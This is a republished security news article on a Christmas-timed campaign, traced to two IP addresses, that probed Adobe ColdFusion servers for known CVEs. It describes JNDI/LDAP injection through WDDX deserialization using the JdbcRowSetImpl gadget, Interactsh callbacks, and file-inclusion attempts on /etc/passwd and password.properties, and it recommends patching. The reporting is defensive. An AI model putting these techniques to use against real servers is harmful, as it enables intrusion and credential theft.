By rssfeeds-admin 
Security research from GreyNoise revealed that a single Japan-based threat actor operating through CTG Server Limited’s infrastructure executed a targeted holiday attack, with 68% of traffic concentrated on Christmas Day, when security monitoring is typically reduced.
The attack campaign demonstrates a deliberate operational strategy. Two primary IP addresses (134.122.136.119 and 134.122.136.96) generated 5,940 requests targeting 10+ ColdFusion CVEs published between 2023 and 2024.
The threat actor leveraged Interactsh, an out-of-band testing tool, to verify successful exploitation through 190 distinct callback domains.
This infrastructure enabled attackers to confirm that payloads successfully compromised ColdFusion installations across 20 countries, with 4,044 sessions originating from targets in the United States.
The primary attack vector employed JNDI/LDAP injection through WDDX deserialization, accounting for 80% of observed payloads.
Attackers utilized the com.sun.rowset.JdbcRowSetImpl gadget chain to trigger JNDI lookups against Interactsh domains, enabling remote code execution on vulnerable ColdFusion instances.
Additional exploitation techniques included local file inclusion attacks targeting credential files like /etc/passwd and password.properties.
Analysis revealed that this ColdFusion campaign accounts for only 0.2% of a much larger reconnaissance operation.
The same two primary actors generated approximately 2.5 million total requests targeting 767 distinct CVEs across 47 technology stacks, including Java application servers, CMS platforms, network devices, and enterprise applications.
This suggests the attackers are operating as an initial access broker, systematically identifying vulnerable infrastructure for potential sale to downstream threat actors.
The infrastructure analysis reveals concerning patterns. CTG Server Limited, a Hong Kong-registered provider operating AS152194, exhibits documented abuse associations.
Research from Silent Push identified this ASN as the top network hosting phishing domains targeting luxury brands such as Chanel and LVMH.
BGP analysis shows the provider announces bogon routes, indicating poor network hygiene standards.
Organizations running Adobe ColdFusion should immediately patch all identified CVEs, implement network-based detection for known Interactsh domains, and block traffic from identified threat actor IP addresses.
The holiday timing of this campaign underscores the importance of maintaining security operations continuity regardless of calendar schedules.
| CVE ID | Vulnerability Type | Requests | CVSS Impact |
|---|---|---|---|
| CVE-2023-26359 | Deserialization RCE | 833 | Critical |
| CVE-2023-38205 | Access Control Bypass | 654 | High |
| CVE-2023-44353 | Remote Code Execution | 611 | Critical |
| CVE-2023-38203 | Remote Code Execution | 346 | Critical |
| CVE-2023-38204 | Remote Code Execution | 346 | Critical |
| CVE-2023-29298 | Access Control Bypass | 342 | High |
| CVE-2023-29300 | Remote Code Execution | 176 | Critical |
| CVE-2023-26347 | Access Control Bypass | 171 | High |
| CVE-2024-20767 | Arbitrary File Read | 146 | High |
| CVE-2023-44352 | Reflected XSS | 8 | Medium |
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyber Press as a Preferred Source in Google.
The post Over 2.5 Million Malicious Requests Target Adobe ColdFusion Servers appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.